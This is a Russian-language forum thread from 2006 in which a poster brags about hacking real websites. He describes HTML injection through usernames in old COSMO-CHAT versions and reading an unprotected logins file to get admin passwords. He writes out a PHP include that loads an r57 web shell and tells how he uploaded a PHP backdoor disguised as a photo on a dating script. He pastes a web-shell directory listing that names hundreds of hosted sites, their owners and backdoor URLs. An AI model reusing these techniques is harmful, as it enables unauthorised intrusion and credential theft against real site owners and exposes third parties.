Дюртюлинский форум

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Дюртюлинский форум » Треш » Взломы и т.п.


Взломы и т.п.

Сообщений 1 страница 30 из 31

1

Однажды вечером я искал какой нибудь чат дя сайта. Так и набрал я в Яндексе
СКАЧАТЬ СКРИПТ ЧАТ.
мой взгляд сразу упал на самый распространенный движок в сети. Это COSMO-CHAT.
Поставив его на своем на своем апаче принялся за изучение кода.
Пройдясь взглядом по странице регестрации сразу же заметил потенциальную
уязвимость. Точнее сказать это была бы уязвимость еслибы небыло нескольких условий.
А точнее сказать: логин не больше 15 знаков, фильтрация пробела, запрет использовать
дважды теги <></>.
Как мы все знаем создатель постоянно улучшает свое детище. И вдруг у меня возникла мысль:
а что если в первых версиях это скрипта все выше описаннные меры защиты отсутствовали.
мои предпложения подтвердились после того как я зашол на  сайта создателя. В разделе история
версий было подробно описано об исправленных багах.
Что интересно : на его сайте стоял COSMO-CHAT. И я решил проверить свои догадки.
Первым делом я зарегестрировался в системе под именем: <H1>ALIK</H1>, то есть использовал
простой ХТМЛ. Как мне было радостно от того что я оказался прав. На индексевой странице
чата самыми большими буквами было написано мое имя. Причем раза в 2-3.
теперь оставалось найти чат на котором все запреты выполнения любого кода отсутствовали.
И опять я воспользовался поисковиком. Введя копирайт и слово cosmo-chat принялся прыгать по сайтам в надежде
найти дырявый срипт. И он нашёлся. причем на довольнотаки раскрученном сайте т.к. только появившиеся
сайты скачивают более позднюю версию скрипта.
И тут началось. Сначало загрузив на свой сервак эротическую картинку я зарегался под именем
<img src=http://durtuli.h10.ru/stud_gizmo.jpg>. После этого вошёл в чат, перешел опять
на главную страницу и нажал обновить. Вы бы видели мое лицо. Оно все светилось от радости.
В разделе В ДАННЫЙ МОМЕНТ В ЧАТЕ: гордо светилась фотография 300*300 с голой девушкой.
ради интереса набрал LOGINS.PHP. И о чудо : Придурочный админ не раставил права на это файл.
В результате все логины высветились и пароли в том числе и администратора. Жаль что этот трюк не
срабатывает на нвых версиях скрипта. Вместо этого мы видим просто чистый экран.
Вернемся к регестрации. Ввел  код для копирования бэкдора с моего сайта. Хатем я снова зарегался и создал фрейм 600*600 в котором выполнялась команда
<?include("./r57shell.php")?>
И вот я уже ковыряюсь в косточках всего сервера. Как было добро с их стороны открыть листинг
верхней директории. Создав запрос поиска слов pass, password, login, я благополучно получил страницу
с логами и паролями а также другой лабудой.

Вот так Как говорится бесплатен только сыр в мышеловке.

Отредактировано stud_gizmo (2006-07-18 14:36:23)

2

Ну ты хак... В итоге это ведь ничего не даёт...

3

Зачем не дает. Я сказал что есть просмотр верхних директорий. Следовательно я имел доступ во все папки включая usr etc и т.д.
Проведя поиск по всему серваку я получил практически все логины и пароли. Включая к mysql.

4

Люблю админов которые юзают известные скрипты на своих серваках. Особенно люблю тех которые скачивают их
с wwwwoweb.ru. почему спросите вы а потому, что скрипты там старые и не обновляются. Зная это скачал я скрипт
которым пользовался и я. Молодой был... Хотя я теоретически знал как использовать этот скрипт в карыстных целях, практиковаться я не пробовал.
Залез на мой любимы гугл и ввел поиск copyright eduha meetings. О да ... Сколько сайтов использовали этот скрипт знакомств. Для тех кто не помнит,, он вроде еще лежит на одном моем серваке. durtuli.hut1.ru или durtulicity. ну короче попробуете повторить.
Короче ошибка заключалась в том что вместо фотографии на сервак отправляем любой бэкдор. именно так я и поступил. Имя естественно поменялось. открывая фотографию мы открываем чтото вроде index.php?photo=9c342b342n34234n.jpg ну а у меня то был пхп поэтому расширение было php. затем мы просто стираем   index.php?photo= а вместо него пишем /photo/ и дальше имя файла, тоесть 9c342b342n34234n.php ура скрипт заработал. Проидясь по конфигам всех сриптов случаено заметил адрес
/free/sites/portal.dump.ru//new/index.php опаньки!!! как мне визет с серваками с разрешенным просмотром верхней директории.
поднялся вверх и моему взору открылись все сайты с доменом 3 уровня.
Если не верите вот он тот самый список.

portal.dump.ru Apache/2.0.52 (Gentoo/Linux) mod_layout/4.0.1a
Directory:     

Filename Size Permission Owner Group Functions
[ . ] drwxr-xr-x root root create link
[ .. ] drwxr-xr-x root root create link
1 12982 B -rwxr-xr-x root root create link | copy
[ 11111.dump.ru ] drwxr-xr-x ronaldo ronaldo create link
[ 4anau.dump.ru ] drwxr-xr-x grim grim create link
[ 666-diesel-666.dump.ru ] drwxr-xr-x diesel diesel create link
[ abandonallhope.dump.ru ] drwxr-xr-x ildogg ildogg create link
[ abandonallhope1.dump.ru ] drwxr-xr-x lol2k lol2k create link
[ accursedmercenaries.dump.ru ] drwxr-xr-x gesser gesser create link
[ admin.dump.ru ] drwxr-xr-x admin admin create link
[ aerospace.dump.ru ] drwxr-xr-x masterpiece03 masterpiece03 create link
[ agmag.dump.ru ] drwxr-xr-x andreyvf andreyvf create link
[ ai-house.dump.ru ] drwxr-xr-x fox fox create link
[ airad.ru ] drwxr-xr-x masterpiece masterpiece create link
[ akordi.dump.ru ] drwxr-xr-x arukz arukz create link
[ akvaservis.dump.ru ] drwxr-xr-x tuareg tuareg create link
[ almaiz.dump.ru ] drwxr-xr-x almaiz almaiz create link
[ angel-clan.dump.ru ] drwxr-xr-x hammer41 hammer41 create link
[ angeldragons ] drwxr-xr-x molotovee molotovee create link
[ antex.dump.ru ] drwxr-xr-x antex antex create link
[ arena.dump.ru ] drwxr-xr-x arenafag arenafag create link
[ arena2.dump.ru ] drwxr-xr-x gd gd create link
[ arena3d.dump.ru ] drwxr-xr-x tolking tolking create link
[ arenafans.dump.ru ] drwxr-xr-x boroda boroda create link
[ arenaruthless.dump.ru ] drwxr-xr-x temnii temnii create link
[ arsen.dump.ru ] drwxr-xr-x arsen arsen create link
[ art-study.dump.ru ] drwxr-xr-x study study create link
[ art.dump.ru ] drwxr-xr-x dalailama dalailama create link
[ artcamera.dump.ru ] drwxr-xr-x artcamer artcamer create link
[ artemy.dump.ru ] drwxr-xr-x artemy artemy create link
[ arthur-satan.dump.ru ] drwxr-xr-x necrolust necrolust create link
[ artweb.dump.ru ] drwxr-xr-x arcwin arcwin create link
[ ask555.dump.ru ] drwxr-xr-x ask555 ask555 create link
[ assault.dump.ru ] drwxr-xr-x slava slava create link
[ audiokniga.dump.ru ] drwxr-xr-x pupkin pupkin create link
[ axe-klan.dump.ru ] drwxr-xr-x unifaker unifaker create link
[ b-m-x.b-m-x.co.uk ] drwxr-xr-x sliper2 728 create link
[ bandits.dump.ru ] drwxr-xr-x kent kent create link
[ bapbap.dump.ru ] drwxr-xr-x dron4ik dron4ik create link
[ bcerkva.dump.ru ] drwxr-xr-x globus globus create link
[ bespredel-server.dump.ru ] drwxr-xr-x mentenok666 mentenok666 create link
[ bg.dump.ru ] drwxr-xr-x bg bg create link
[ biz.dump.ru ] drwxr-xr-x biz biz create link
[ bizar-foto.dump.ru ] drwxr-xr-x masha masha create link
[ bizar.dump.ru ] drwxr-xr-x system_cccp system_cccp create link
[ bizarrecccp.dump.ru ] drwxr-xr-x shaman shaman create link
[ bizzz.dump.ru ] drwxr-xr-x bizzz bizzz create link
[ black-evil.dump.ru ] drwxr-xr-x black_evil black_evil create link
[ blooddragon.dump.ru ] drwxr-xr-x dmitriy dmitriy create link
[ blooddragons.dump.ru ] drwxr-xr-x dragon dragon create link
[ bmc-clan.dump.ru ] drwxr-xr-x 191985 191985 create link
[ bmc.dump.ru ] drwxr-xr-x radik radik create link
[ boarder.dump.ru ] drwxr-xr-x tufyakov tufyakov create link
[ booblik.dump.ru ] drwxr-xr-x booblik booblik create link
[ bos.dump.ru ] drwxr-xr-x bos bos create link
[ britneyfederline.dump.ru ] drwxr-xr-x liza1 liza1 create link
[ burglar.dump.ru ] drwxr-xr-x burglar burglar create link
[ caca.dump.ru ] drwxr-xr-x caca caca create link
[ catorg.dump.ru ] drwxr-xr-x sabaka sabaka create link
[ cccp.dump.ru ] drwxr-xr-x dron dron create link
[ centurion.dump.ru ] drwxr-xr-x centurion centurion create link
[ centurion23.dump.ru ] drwxr-xr-x centurion23 centurion23 create link
[ chat.dump.ru ] drwxr-xr-x chat chat create link
[ chigivara.dump.ru ] drwxr-xr-x liat liat create link
[ cjmbv.dump.ru ] drwxr-xr-x cjmbv cjmbv create link
[ clan-angels.dump.ru ] drwxr-xr-x black_pearls black_pearls create link
[ clan.dump.ru ] drwxr-xr-x jeison jeison create link
[ cn-chat.dump.ru ] drwxr-xr-x cnchat cnchat create link
[ cn.dump.ru ] drwxr-xr-x cn cn create link
[ combats.dump.ru ] drwxr-xr-x asd asd create link
[ crazybear.dump.ru ] drwxr-xr-x crazy_bear crazy_bear create link
[ crus-clan.dump.ru ] drwxr-xr-x crusader crusader create link
[ crypt0rebe1.dump.ru ] drwxr-xr-x crypt0rebe1 crypt0rebe1 create link
[ cypherpunk.dump.ru ] drwxr-xr-x cypherpunk cypherpunk create link
[ d0ct0r.dump.ru ] drwxr-xr-x d0ct0r d0ct0r create link
[ da.dump.ru ] drwxr-xr-x zoge zoge create link
[ daarpr.dump.ru ] drwxr-xr-x daarpr daarpr create link
[ danhair.dump.ru ] drwxr-xr-x danhair1 danhair1 create link
[ darkdemons.dump.ru ] drwxr-xr-x demons demons create link
[ darkmandor.dump.ru ] drwxr-xr-x dark_mandor dark_mandor create link
[ dealer-tmn.dump.ru ] drwxr-xr-x samovar samovar create link
[ deathofmar.dump.ru ] drwxr-xr-x domar domar create link
[ debian.dump.ru ] drwxr-xr-x debian debian create link
[ defenders.dump.ru ] drwxr-xr-x def def create link
[ denteks.dump.ru ] drwxr-xr-x denteks denteks create link
[ desvis.dump.ru ] drwxr-xr-x cernos cernos create link
[ dima51025.dump.ru ] drwxr-xr-x dima51025 840 create link
[ dimok-site.ru ] drwxr-xr-x dimok dimok create link
[ dimonua.dump.ru ] drwxr-xr-x dimonss dimonss create link
[ dj-rus.dump.ru ] drwxr-xr-x dj_rus dj_rus create link
[ dlegacy.dump.ru ] drwxr-xr-x deflexx13 deflexx13 create link
[ dm.dump.ru ] drwxr-xr-x dmikula dmikula create link
[ dnb.dump.ru ] drwxr-xr-x gidrokso gidrokso create link
[ docs.dump.ru ] drwxr-xr-x docs docs create link
[ doomlab.dump.ru ] drwxr-xr-x bidoom bidoom create link
[ downloads.dump.ru ] drwxr-xr-x downloads downloads create link
[ dpoul.dump.ru ] drwxr-xr-x dpoul dpoul create link
[ dragonheart.dump.ru ] drwxr-xr-x ariadna ariadna create link
[ ds.dump.ru ] drwxr-xr-x undead undead create link
[ dumb.dump.ru ] drwxr-xr-x tierpunk tierpunk create link
[ dumper.dump.ru ] drwxr-xr-x dump dump create link
[ dwld.dump.ru ] drwxr-xr-x dwld dwld create link
[ easydesign.dump.ru ] drwxr-xr-x seagor seagor create link
[ eklipse.dump.ru ] drwxr-xr-x eklipse eklipse create link
[ emili.dump.ru ] drwxr-xr-x xyligan xyligan create link
[ evildeath.dump.ru ] drwxr-xr-x zloy zloy create link
[ evolution.dump.ru ] drwxr-xr-x flafi flafi create link
[ exe.dump.ru ] drwxr-xr-x exepashok 582 create link
[ exer.dump.ru ] drwxr-xr-x exer 658 create link
[ exnik.dump.ru ] drwxr-xr-x ex ex create link
[ exzorcium.dump.ru ] drwxr-xr-x fagoggi fagoggi create link
[ fa.dump.ru ] drwxr-xr-x ff ff create link
[ fag.dump.ru ] drwxr-xr-x fag fag create link
[ fallen-angels.dump.ru ] drwxr-xr-x final final create link
[ fallenangels.dump.ru ] drwxr-xr-x alvo alvo create link
[ fasty.dump.ru ] drwxr-xr-x fasty fasty create link
[ fishki.dump.ru ] drwxr-xr-x koko koko create link
[ fl.dump.ru ] drwxr-xr-x fl fl create link
[ flash1990.dump.ru ] drwxr-xr-x flash1990 flash1990 create link
[ football ] drwxr-xr-x arswin arswin create link
[ football.dump.ru ] drwxr-xr-x pashok pashok create link
[ forrester.dump.ru ] drwxr-xr-x forrester forrester create link
[ forum.dump.ru ] drwxr-xr-x timeparty timeparty create link
[ free-from-ruzzer.dump.ru ] drwxr-xr-x hope hope create link
[ free.dump.ru ] drwxr-xr-x ruz ruz create link
[ friends.dump.ru ] drwxr-xr-x exerwww 659 create link
[ g2al.dump.ru ] drwxr-xr-x g2al g2al create link
[ geodata.dump.ru ] drwxr-xr-x kolya7k kolya7k create link
[ gladiators.dump.ru ] drwxr-xr-x glashatai glashatai create link
[ gmail.dump.ru ] drwxr-xr-x gmail gmail create link
[ goa.dump.ru ] drwxr-xr-x goa123 goa123 create link
[ goodzon.dump.ru ] drwxr-xr-x goodzon goodzon create link
[ gr-smena.dump.ru ] drwxr-xr-x graf graf create link
[ gregorio.dump.ru ] drwxr-xr-x gregory gregory create link
[ grsmena.dump.ru ] drwxr-xr-x evgenii evgenii create link
[ gsm.dump.ru ] drwxr-xr-x gsm gsm create link
[ gsmena.dump.ru ] drwxr-xr-x grafbox grafbox create link
[ gwl.dump.ru ] drwxr-xr-x arbuzzz arbuzzz create link
[ hellsing.dump.ru ] drwxr-xr-x morfik morfik create link
[ help-for-outher.dump.ru ] drwxr-xr-x bianka bianka create link
[ help.dump.ru ] drwxr-xr-x idromstasya idromstasya create link
[ hohli.dump.ru ] drwxr-xr-x hohli hohli create link
[ hr.dump.ru ] drwxr-xr-x hr hr create link
[ hraniteli.dump.ru ] drwxr-xr-x vasil vasil create link
[ hunter.dump.ru ] drwxr-xr-x hunter hunter create link
[ ibaskakov.dump.ru ] drwxr-xr-x ibaskakov ibaskakov create link
[ icslab.dump.ru ] drwxr-xr-x igorc2005 igorc2005 create link
[ ilgizastr.dump.ru ] drwxr-xr-x ilgizastr ilgizastr create link
[ inev.dump.ru ] drwxr-xr-x inevolin inevolin create link
[ inquisitor.dump.ru ] drwxr-xr-x lightly lightly create link
[ inquisitors.dump.ru ] drwxr-xr-x light light create link
[ interesno.dump.ru ] drwxr-xr-x jundor jundor create link
[ iof.dump.ru ] drwxr-xr-x ernestoguevara ernestoguevara create link
[ irishka.dump.ru ] drwxr-xr-x irishka irishka create link
[ iriwka.com ] drwxr-xr-x jj jj create link
[ ivp.dump.ru ] drwxr-xr-x ivpdumpru 818 create link
[ jid.dump.ru ] drwxr-xr-x jid jid create link
[ journ.dump.ru ] drwxr-xr-x anclaw anclaw create link
[ jtr.dump.ru ] drwxr-xr-x jtr jtr create link
[ julia-mike.dump.ru ] drwxr-xr-x julia_mike julia_mike create link
[ kakashka.dump.ru ] drwxr-xr-x kokakoka kokakoka create link
[ kalmykov.dump.ru ] drwxr-xr-x virusx2004 virusx2004 create link
[ karton.dump.ru ] drwxr-xr-x karton karton create link
[ kerosinka.dump.ru ] drwxr-xr-x kerosinka kerosinka create link
[ kizub.dump.ru ] drwxr-xr-x kizub kizub create link
[ klondike.dump.ru ] drwxr-xr-x klondike klondike create link
[ koa.dump.ru ] drwxr-xr-x svs svs create link
[ kobra.dump.ru ] drwxr-xr-x orion orion create link
[ kokokos.dump.ru ] drwxr-xr-x kokokos 647 create link
[ kolektor.dump.ru ] drwxr-xr-x kolektor kolektor create link
[ kolyaka.dump.ru ] drwxr-xr-x kolyaka kolyaka create link
[ kombina.dump.ru ] drwxr-xr-x dj dj create link
[ konohov.dump.ru ] drwxr-xr-x konohov konohov create link
[ kots.dump.ru ] drwxr-xr-x kaka kaka create link
[ kroniak.dump.ru ] drwxr-xr-x kroniak kroniak create link
[ kvasilyev.dump.ru ] drwxr-xr-x kvasilyev kvasilyev create link
[ kweb.dump.ru ] drwxr-xr-x 123 584 create link
[ l2-bespredel.dump.ru ] drwxr-xr-x kopir kopir create link
[ l2.dump.ru ] drwxr-xr-x blacklist blacklist create link
[ l2c3test.dump.ru ] drwxr-xr-x slaik slaik create link
[ la2.dump.ru ] drwxr-xr-x zerocool zerocool create link
[ lamer.dump.ru ] drwxr-xr-x loyura loyura create link
[ landgf.dump.ru ] drwxr-xr-x freeon freeon create link
[ lawguard.dump.ru ] drwxr-xr-x cr45h cr45h create link
[ league.dump.ru ] drwxr-xr-x ges ges create link
[ leaguearena.dump.ru ] drwxr-xr-x beelaz beelaz create link
[ legenda.dump.ru ] drwxr-xr-x gothic gothic create link
[ legion-on-line.dump.ru ] drwxr-xr-x jerom jerom create link
[ lg.dump.ru ] drwxr-xr-x 1121 apache create link
[ lineage-kpss.dump.ru ] drwxr-xr-x mentenok mentenok create link
[ lineage2.dump.ru ] drwxr-xr-x izzril izzril create link
[ lineages.dump.ru ] drwxr-xr-x zenez zenez create link
[ linuz.dump.ru ] drwxr-xr-x redbyte redbyte create link
[ lkir.dump.ru ] drwxr-xr-x lkirill lkirill create link
[ lol.dump.ru ] drwxr-xr-x lol lol create link
[ love.dump.ru ] drwxr-xr-x love love create link
[ lupuscanus.dump.ru ] drwxr-xr-x 565 apache create link
[ maddan.nnov.ru ] drwxr-xr-x maddan maddan create link
[ magican.dump.ru ] drwxr-xr-x bakc bakc create link
[ malakhoff.dump.ru ] drwxr-xr-x malakhoff malakhoff create link
[ mangust.dump.ru ] drwxr-xr-x plohish plohish create link
[ mangusts.pk ] drwxr-xr-x anderson anderson create link
[ mastakxx.dump.ru ] drwxr-xr-x iliya1975 iliya1975 create link
[ mau.dump.ru ] drwxr-xr-x mau mau create link
[ maximus.dump.ru ] drwxr-xr-x maximus maximus create link
[ maxy.dump.ru ] drwxr-xr-x maxy maxy create link
[ mcp.dump.ru ] drwxr-xr-x wmaster 602 create link
[ mdbm.dump.ru ] drwxr-xr-x ghbdtn ghbdtn create link
[ megas99.dump.ru ] drwxr-xr-x megas megas create link
[ melicenta.dump.ru ] drwxr-xr-x melicenta melicenta create link
[ mia.dump.ru ] drwxr-xr-x mia mia create link
[ mio.dump.ru ] drwxr-xr-x mio mio create link
[ mobila.dump.ru ] drwxr-xr-x bobik bobik create link
[ mobila.ru ] drwxr-xr-x bobik911 bobik911 create link
[ mobilaforum.dump.ru ] drwxr-xr-x alex alex create link
[ mobile.dump.ru ] drwxr-xr-x mobile mobile create link
[ mod.dump.ru ] drwxr-xr-x eye eye create link
[ moldovan.dump.ru ] drwxr-xr-x fadeev fadeev create link
[ montana.dump.ru ] drwxr-xr-x sonic12 sonic12 create link
[ mos-rio.dump.ru ] drwxr-xr-x razlog razlog create link
[ mp3.dump.ru ] drwxr-xr-x mp3ps mp3ps create link
[ mtsxaker.dump.ru ] drwxr-xr-x mtsxaker mtsxaker create link
[ multvir.dump.ru ] drwxr-xr-x multvir multvir create link
[ my-millenium.net ] drwxr-xr-x doberman doberman create link
[ nabat.dump.ru ] drwxr-xr-x yaricz yaricz create link
[ napwin.dump.ru ] drwxr-xr-x napwin napwin create link
[ neo.dump.ru ] drwxr-xr-x neo neo create link
[ neseclub.dump.ru ] drwxr-xr-x neseclub neseclub create link
[ nfs.dump.ru ] drwxr-xr-x nfs nfs create link
[ niko.dump.ru ] drwxr-xr-x nikolodium nikolodium create link
[ nooduk.dump.ru ] drwxr-xr-x nooduk nooduk create link
[ northlegion.dump.ru ] drwxr-xr-x flash flash create link
[ ns.dump.ru ] drwxr-xr-x root root create link
[ nstrangers.dump.ru ] drwxr-xr-x death death create link
[ null.dump.ru ] drwxr-xr-x zerocoolan zerocoolan create link
[ nv.dump.ru ] drwxr-xr-x dj_killer dj_killer create link
[ oga.dump.ru ] drwxr-xr-x 9873283 543 create link
[ ohotniki.dump.ru ] drwxr-xr-x nemec nemec create link
[ olimpus.dump.ru ] drwxr-xr-x cotor cotor create link
[ olympus.dump.ru ] drwxr-xr-x cator cator create link
[ onelife.dump.ru ] drwxr-xr-x onelife onelife create link
[ orda.dump.ru ] drwxr-xr-x lazycat lazycat create link
[ orden.sveta.dump.ru ] drwxr-xr-x bubble bubble create link
[ ostin.dump.ru ] drwxr-xr-x ostin654 ostin654 create link
[ ot.dump.ru ] drwxr-xr-x o_t o_t create link
[ ox-team.dump.ru ] drwxr-xr-x vanes vanes create link
[ pctech.dump.ru ] drwxr-xr-x guru guru create link
[ pda-soft.dump.ru ] drwxr-xr-x labu1 649 create link
[ pda.dump.ru ] drwxr-xr-x tema tema create link
[ photo.dump.ru ] drwxr-xr-x serg0203 serg0203 create link
[ photochange.dump.ru ] drwxr-xr-x bast bast create link
[ photochange.ru ] drwxr-xr-x k49 k49 create link
[ pk-rulez.dump.ru ] drwxr-xr-x nikish nikish create link
[ plati.dump.ru ] drwxr-xr-x inev inev create link
[ platina.dump.ru ] drwxr-xr-x kuzja kuzja create link
[ politon.dump.ru ] drwxr-xr-x politon politon create link
[ poltin.dump.ru ] drwxr-xr-x poltin poltin create link
[ portal.dump.ru ] drwxr-xr-x revnost revnost create link | move | delete
[ prikol.dump.ru ] drwxr-xr-x bober bober create link
[ primus.dump.ru ] drwxr-xr-x lilmaryann lilmaryann create link
[ princes.dump.ru ] drwxr-xr-x zevs zevs create link
[ probas.dump.ru ] drwxr-xr-x nik123 nik123 create link
[ punishers.dump.ru ] drwxr-xr-x darkmandor darkmandor create link
[ pupukin.dump.ru ] drwxr-xr-x pupukin pupukin create link
[ qwering.dump.ru ] drwxr-xr-x baraban baraban create link
[ radionet.dump.ru ] drwxr-xr-x radionet radionet create link
[ rallyspb.dump.ru ] drwxr-xr-x rallyspb rallyspb create link
[ rammsteinfan.dump.ru ] drwxr-xr-x kamikadze kamikadze create link
[ rangers.dump.ru ] drwxr-xr-x rangers rangers create link
[ ravnopravie.dump.ru ] drwxr-xr-x ploxoy ploxoy create link
[ realscooter.dump.ru ] drwxr-xr-x akykard akykard create link
[ rfclan.dump.ru ] drwxr-xr-x diaz diaz create link
[ robbers.dump.ru ] drwxr-xr-x dreamer dreamer create link
[ roland.dump.ru ] drwxr-xr-x roland roland create link
[ rt147.dump.ru ] drwxr-xr-x rt147 rt147 create link
[ rtfan.dump.ru ] drwxr-xr-x kamikadze2 kamikadze2 create link
[ ruald.dump.ru ] drwxr-xr-x ruald ruald create link
[ runescape2.dump.ru ] drwxr-xr-x kalob kalob create link
[ ruthless.dump.ru ] drwxr-xr-x temnii_mag temnii_mag create link
[ ruthlessforum.dump.ru ] drwxr-xr-x polifag polifag create link
[ ruthlesswarriors.dump.ru ] drwxr-xr-x temniimag temniimag create link
[ ruzzer2005.dump.ru ] drwxr-xr-x moscowissity2005 moscowissity2005 create link
[ ruzzerok.dump.ru ] drwxr-xr-x ruzzer2005 ruzzer2005 create link
[ ruzzerportal.dump.ru ] drwxr-xr-x matrix matrix create link
[ rway.dump.ru ] drwxr-xr-x rwaycomru rwaycomru create link
[ rysskii.dump.ru ] drwxr-xr-x rysskii rysskii create link
[ saitnazacaz.dump.ru ] drwxr-xr-x antondubov antondubov create link
[ samurai.dump.ru ] drwxr-xr-x lamborghini lamborghini create link
[ satans.dump.ru ] drwxr-xr-x ljeprorok ljeprorok create link
[ school.dump.ru ] drwxr-xr-x school school create link
[ school154.dump.ru ] drwxr-xr-x school154 school154 create link
[ script.dump.ru ] drwxr-xr-x script script create link
[ scripts.dump.ru ] drwxr-xr-x scripts scripts create link
[ sejuro.dump.ru ] drwxr-xr-x qwertyuiop 693 create link
[ senko.dump.ru ] drwxr-xr-x andreis andreis create link
[ senko.pp.ru ] drwxr-xr-x senko senko create link
[ serg.dump.ru ] drwxr-xr-x seregka seregka create link
[ shadow3dd.dump.ru ] drwxr-xr-x shadxxx shadxxx create link
[ shaman-king.dump.ru ] drwxr-xr-x elin elin create link
[ shony.dump.ru ] drwxr-xr-x qwerty qwerty create link
[ sirius-club.dump.ru ] drwxr-xr-x shaman_cccp shaman_cccp create link
[ sirius.dump.ru ] drwxr-xr-x lepekhov_cccp lepekhov_cccp create link
[ site-dimok.ru ] drwxr-xr-x dimok468 dimok468 create link
[ sith.dump.ru ] drwxr-xr-x good good create link
[ skitalec.dump.ru ] drwxr-xr-x alexsey alexsey create link
[ skyruner.dump.ru ] drwxr-xr-x ares ares create link
[ slody.dump.ru ] drwxr-xr-x slody slody create link
[ smil3.dump.ru ] drwxr-xr-x bloodyy bloodyy create link
[ smol.dump.ru ] drwxr-xr-x motoclick motoclick create link
[ soad.dump.ru ] drwxr-xr-x soil soil create link
[ soft.dump.ru ] drwxr-xr-x soft soft create link
[ softlux.dump.ru ] drwxr-xr-x negativegreep negativegreep create link
[ soil.dump.ru ] drwxr-xr-x misha misha create link
[ soko-ban.dump.ru ] drwxr-xr-x makc makc create link
[ solnechny.dump.ru ] drwxr-xr-x solnechny solnechny create link
[ sorceror.dump.ru ] drwxr-xr-x naisha naisha create link
[ sordelka.dump.ru ] drwxr-xr-x sekvent sekvent create link
[ sovetsk.dump.ru ] drwxr-xr-x sovetsk sovetsk create link
[ spacemarines.dump.ru ] drwxr-xr-x dzirtik dzirtik create link
[ spacemars.dump.ru ] drwxr-xr-x dzirt dzirt create link
[ spacerangers.dump.ru ] drwxr-xr-x spacerangers spacerangers create link
[ spirits.dump.ru ] drwxr-xr-x spirits spirits create link
[ spyk.dump.ru ] drwxr-xr-x spyk spyk create link
[ stihii.dump.ru ] drwxr-xr-x seregas seregas create link
[ stronghold.dump.ru ] drwxr-xr-x loksli23 loksli23 create link
[ student.dump.ru ] drwxr-xr-x devil devil create link
[ super-chat.dump.ru ] drwxr-xr-x dima dima create link
[ supervise ] drwxr-xr-x root apache create link
[ syndicate.dump.ru ] drwxr-xr-x syndicate syndicate create link
[ system-lv.dump.ru ] drwxr-xr-x sliper sliper create link
[ tatschool.dump.ru ] drwxr-xr-x tatschool tatschool create link
[ tcp.dump.ru ] drwxr-xr-x homa homa create link
[ team-arena.dump.ru ] drwxr-xr-x leon leon create link
[ teplohod2005.dump.ru ] drwxr-xr-x yulia yulia create link
[ test-denis.dump.ru ] drwxr-xr-x denis denis create link
[ test.dump.ru ] drwxr-xr-x proverka proverka create link
[ tj.dump.ru ] drwxr-xr-x abdullah abdullah create link
[ tokmak.dump.ru ] drwxr-xr-x grek grek create link
[ tokmakcity.net ] drwxr-xr-x greka greka create link
[ tolls.dump.ru ] drwxr-xr-x bmctolls bmctolls create link
[ total-disconnect.dump.ru ] drwxr-xr-x alecs alecs create link
[ trikoz.dump.ru ] drwxr-xr-x cibergod cibergod create link
[ tundrer.dump.ru ] drwxr-xr-x tundr tundr create link
[ ubfil.dump.ru ] drwxr-xr-x sergei22 sergei22 create link
[ unifaker.dump.ru ] drwxr-xr-x oleg oleg create link
[ uoghd.dump.ru ] drwxr-xr-x reijii reijii create link
[ us.dump.ru ] drwxr-xr-x jenny jenny create link
[ vadiam.dump.ru ] drwxr-xr-x vadiam vadiam create link
[ vaklan.dump.ru ] drwxr-xr-x crez crez create link
[ varvara.dump.ru ] drwxr-xr-x varvara varvara create link
[ varyag.dump.ru ] drwxr-xr-x troll troll create link
[ vaso.dump.ru ] drwxr-xr-x icehold icehold create link
[ vcadniki.dump.ru ] drwxr-xr-x artezzz artezzz create link
[ verbatim.dump.ru ] drwxr-xr-x emili emili create link
[ videodoc.dump.ru ] drwxr-xr-x videodoc videodoc create link
[ vip.dump.ru ] drwxr-xr-x andron andron create link
[ vl.dump.ru ] drwxr-xr-x lab lab create link
[ vodka.dump.ru ] drwxr-xr-x vodka vodka create link
[ wapz.dump.ru ] drwxr-xr-x play play create link
[ web-study.dump.ru ] drwxr-xr-x art art create link
[ webfile.dump.ru ] drwxr-xr-x doom doom create link
[ webmaster.dump.ru ] drwxr-xr-x bolvanka bolvanka create link
[ wedwar.dump.ru ] drwxr-xr-x wadmak wadmak create link
[ werde.dump.ru ] drwxr-xr-x werde werde create link
[ windser.dump.ru ] drwxr-xr-x windser windser create link
[ wma.dump.ru ] drwxr-xr-x wma wma create link
[ ww3.dump.ru ] drwxr-xr-x 3d 680 create link
[ wwiii.dump.ru ] drwxr-xr-x wwiii wwiii create link
[ http://portal.dump.ru/meeting/foto/81f7f0f9d6786b85a2ad8f332ab1a1c2.php?dir=/free/sites/www.catalog.ru/&amp;id=5aa3a2005d32ea5afbb69a4c1f57833e ] drwxr-xr-x pomny pomny create link
[ http://portal.dump.ru/meeting/foto/81f7f0f9d6786b85a2ad8f332ab1a1c2.php?dir=/free/sites/www.gta.ru/&amp;id=5aa3a2005d32ea5afbb69a4c1f57833e ] drwxr-xr-x qqq qqq create link
[ http://portal.dump.ru/meeting/foto/81f7f0f9d6786b85a2ad8f332ab1a1c2.php?dir=/free/sites/www.rallyspb.com/&amp;id=5aa3a2005d32ea5afbb69a4c1f57833e ] drwxr-xr-x rally rally create link
[ http://portal.dump.ru/meeting/foto/81f7f0f9d6786b85a2ad8f332ab1a1c2.php?dir=/free/sites/www.rallyspb.com.ru/&amp;id=5aa3a2005d32ea5afbb69a4c1f57833e ] drwxr-xr-x fristail_stinger fristail_stinger create link
[ http://portal.dump.ru/meeting/foto/81f7f0f9d6786b85a2ad8f332ab1a1c2.php?dir=/free/sites/www.ricci.ru/&amp;id=5aa3a2005d32ea5afbb69a4c1f57833e ] drwxr-xr-x riccisol riccisol create link
[ http://portal.dump.ru/meeting/foto/81f7f0f9d6786b85a2ad8f332ab1a1c2.php?dir=/free/sites/www.ussr-proect.be/&amp;id=5aa3a2005d32ea5afbb69a4c1f57833e ] drwxr-xr-x sila sila create link
[ wwww2.dump.ru ] drwxr-xr-x wwwww wwwww create link
[ xalyava.dump.ru ] drwxr-xr-x xalyava xalyava create link
[ xo4y.dump.ru ] drwxr-xr-x revnostsh revnostsh create link
[ xobat.dump.ru ] drwxr-xr-x xobat xobat create link
[ xoxlu.dump.ru ] drwxr-xr-x igorek igorek create link
[ xzibit.dump.ru ] drwxr-xr-x ser_gey ser_gey create link
[ yurij.dump.ru ] drwxr-xr-x volk volk create link
[ zampolit.com.ru ] drwxr-xr-x zampolit zampolit create link
[ zanoza.dump.ru ] drwxr-xr-x zanoza zanoza create link
[ zhitomir.dump.ru ] drwxr-xr-x zhitomir zhitomir create link
